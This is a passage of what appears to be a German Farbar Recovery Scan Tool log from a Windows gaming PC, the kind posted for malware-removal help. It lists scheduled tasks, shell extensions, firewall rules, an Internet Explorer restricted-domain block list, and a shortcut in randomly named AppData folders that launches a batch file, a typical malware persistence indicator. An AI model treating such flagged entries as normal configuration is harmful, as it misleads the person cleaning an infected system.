ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => G:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger)
ContextMenuHandlers1-x32: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => -> Keine Datei
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Keine Datei
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei
ContextMenuHandlers1_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {0317339D-827C-47F3-91C4-7324B9D0FA87} - System32\Tasks\{A380CFB5-96EE-4AD0-A8F5-D66D9C86A514} => C:\WINDOWS\system32\pcalua.exe -a "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff\The Treasures of Mystery Island - Das Geisterschiff.exe" -d "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff"
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {1B266482-966D-4C9C-A722-E1BEFB5D28B0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {3BD02220-2F87-42CC-B767-EECC4E9F9601} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {3C37C677-69CD-441A-8D47-EEB67B7220B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-26] (NVIDIA Corporation)
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {46ECB298-DE9D-4F8C-A5C9-75A7C20EFE1F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd)
Task: {4C001B95-7BB8-481D-BBD9-D9E3DEF59DFE} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-26] (NVIDIA Corporation)
Task: {50222EEB-D09E-4AF2-A9C7-16E8BA809C5C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-08-08] (Microsoft Corporation)
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {5695EF73-2130-43FB-B248-51C430A387A4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {5DA81636-2ECE-4830-AE1B-077999FE28A7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {64670950-29B6-4622-AFED-B1C8B63CBDAB} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {6A99B42D-8E1B-44BD-87EB-FD3F84C0DCFC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {96B4A76A-E0A9-497A-B6C0-43AC09DF5333} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {98644CA8-C542-4436-AFE3-3272F8AD1B07} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {A1DC91F7-197C-4208-AE19-8D4190EB04A4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-26] (NVIDIA Corporation)
Task: {A36A36C9-7C2C-4BAB-8C32-209FE107A789} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {AAFBDA33-C21C-4668-9CAF-14B06F45FC3D} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {B5B3C199-8D05-4D87-98CE-C413AAFB8290} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-26] (NVIDIA Corporation)
Task: {B75DE4BB-2CA4-4515-85EA-0B346AAB0160} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {B918F1B1-79A9-45D6-8195-051607EF371D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {C1A8AE88-41C5-4E46-BD3E-B0C94C9179A9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d25a61a78c34b7 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {D2EEA344-C1E2-4667-98B9-3F9655F456C6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d25a61a7879fb6 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen & WMI ========================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
Shortcut: C:\Users\*****\AppData\Local\Rvurcez\bdobyjg.lnk -> C:\Users\*****\AppData\Local\Bizpiwcinu\arvikxihn.bat ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:36 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 000074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-07-18 00:26 - 2017-07-18 00:26 - 000203264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 043573248 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 002435584 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\skypert.dll
2017-06-30 13:22 - 2017-06-30 13:22 - 000069632 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2016-09-29 12:59 - 2017-07-26 19:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-07-31 20:55 - 2017-04-18 19:01 - 002493440 _____ () G:\Program Files (x86)\Origin\libGLESv2.dll
2017-06-20 11:28 - 2017-06-20 11:28 - 001997792 ____R () C:\Program Files (x86)\Skype\Phone\skypert.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100sexlinks.com -> 100sexlinks.com

Da befinden sich 4789 mehr Seiten.

==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2013-08-22 15:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg
DNS Servers: 62.2.24.162 - 62.2.17.61
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
MSCONFIG\Services: PDF Architect 5 Manager => 2
HKLM\...\StartupApproved\StartupFolder: => "UE Music Library-Taskleisten-Tool.lnk"
HKLM\...\StartupApproved\StartupFolder: => "simplicheck.lnk"
HKLM\...\StartupApproved\Run32: => "UpdReg"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\Run: => "BingSvc"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{A48CA470-A870-4179-B1B2-4E1B515CF8CC}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe FirewallRules: [{15C73935-9422-4FF2-8044-5909C2A58895}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe FirewallRules: [UDP Query User{9EE745C2-5DD7-43D6-AC1A-F4CB56837C77}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe FirewallRules: [TCP Query User{7CDC35E1-0481-4B34-B7A2-07A7BF9EA6B4}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe FirewallRules: [UDP Query User{02439386-6E1B-4B1A-85CE-2BAEDC630B7D}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe FirewallRules: [TCP Query User{21237B05-7282-4B4E-A1B9-166036A3F782}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe FirewallRules: [UDP Query User{DF239A90-3015-4A02-9683-656B9FF43E4E}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe FirewallRules: [TCP Query User{ACCBBD61-2F9E-4EB0-85D4-5BA97DE3FBCF}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe FirewallRules: [{0D1B9AD2-C22B-49E0-A70F-ACB9065E4C01}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe FirewallRules: [{E0EEBF19-98E6-42DE-BFD5-648FE1CAC4EA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe FirewallRules: [UDP Query User{A99BD097-FB9C-4197-B13A-5C40B5146AE9}G:\program files (x86)\steam\steamapps\common\total war 
warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [TCP Query User{2AAE67D8-35FC-4732-ACEC-7220F4914FE7}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [UDP Query User{E7165155-1031-43E7-9F56-B39F3081C3FC}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe FirewallRules: [TCP Query User{015D5357-1B6C-4BB6-8E04-A92E4DEE27D8}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe FirewallRules: [{9D819DCB-2F2A-4F0C-8B4E-BAF745DDCDAA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe FirewallRules: [{6AD5DAF0-AD0C-4397-80FB-784D39972676}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe FirewallRules: [{BC6EB3F3-2A98-46F0-9150-BCC21E2A56E7}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{F69BB511-8722-4AC1-826A-17EF9DF0BC0E}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{B4593F94-2FA0-4595-B476-E2B14AA8F5C2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe FirewallRules: [{4C81C009-BCAE-43D4-9498-8EAE2B0A4C6A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe FirewallRules: [{310A94E6-73AC-4ED9-B2FC-0B186AB40DE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{B32AAF55-10AB-4914-B9AE-52159DE5512C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe FirewallRules: [{B09ADEED-B680-4B72-900B-77D2C4F2650F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times 
Vermintide\binaries\vermintide.exe FirewallRules: [{49966F41-9BFA-48F3-A63D-8FACAF2E5036}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe FirewallRules: [{2FC5A6BD-BF05-4164-89C1-16FE7BF2BAE1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe FirewallRules: [{C2397ABC-794C-40AF-A15E-DA816A4EC318}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe FirewallRules: [{B1052126-2905-42E2-956D-850CCD9C1014}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe FirewallRules: [UDP Query User{0FF06ECA-E1F0-41B0-8FCD-126D174715D0}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe FirewallRules: [TCP Query User{6928C914-94B4-4F89-99D1-4AA5BBD06AFC}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe FirewallRules: [UDP Query User{98FBAFC3-976A-4164-813B-40F32032BBDF}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [TCP Query User{8030943B-531A-4F01-9F2A-FF946F4B1285}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [UDP Query User{54BD8357-54B2-4494-9854-D8EDB5EC5113}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query 
User{BA245DA0-2241-46ED-8F5B-6B4A4A9FF1F7}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{2B51C0D6-D4E8-4CC0-8271-F4A911C2F406}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [TCP Query User{437D4E9B-EC49-4CF6-8CD2-921830F6564C}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [{39430812-9852-49ED-9F86-904CB000274A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe FirewallRules: [{7376B877-0383-44F7-909E-07F9D738AFA7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe FirewallRules: [{22067E9A-32F2-40FF-AC7A-01F94C55642C}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe FirewallRules: [{8D47AC7F-25CB-4C41-A7BA-EF713FCE93CF}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe FirewallRules: [{A7EEE726-FE30-4C66-8AD5-93D5C3C96B07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe FirewallRules: [{87C53834-94A0-4EEA-B4F5-6311177D9A07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe FirewallRules: [{EA9F2049-950D-439D-85B9-02D649D73245}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe FirewallRules: [{247328BE-4699-4A3F-A6CA-661592F926AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe FirewallRules: [{DD07B558-9E11-4AAD-9B6D-7B75E3B4B53B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe FirewallRules: [{F4996C83-AA13-4703-B61B-4A89884F8B90}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 
2\Binaries\Win32\Launcher.exe FirewallRules: [{679B2599-B113-4728-B3FA-84E705F0BBDD}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{96341DDC-B74C-4FDE-A455-66A4B4835DF6}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{6818289E-239B-49EE-B001-FB69A2E6A8C0}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe FirewallRules: [{F0859AC3-60E3-4D00-B630-170BF1C441E5}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe FirewallRules: [{B515A77B-C22A-4D35-957F-4BC619063FF5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe FirewallRules: [{42C09225-0BCA-4B7A-A912-874BA402CA17}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe FirewallRules: [{4F1029AB-0FBD-45F8-9898-689A2D6F9BAC}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{679F21A3-8A59-45B3-8C1E-EFE5E0710C63}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe FirewallRules: [TCP Query User{FB088684-BBC4-4D8B-BBAF-5842DA9EE196}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{2A8CE33E-EC98-4518-B46D-42E1DEA51F46}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [{4D766A26-785C-455E-B90F-F910A14E7B7F}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [{451F15F9-2D6B-46B6-ACB5-710CD2226BDD}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [TCP Query User{37632275-71A2-49D8-A0FA-70CCB7875F1E}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: 
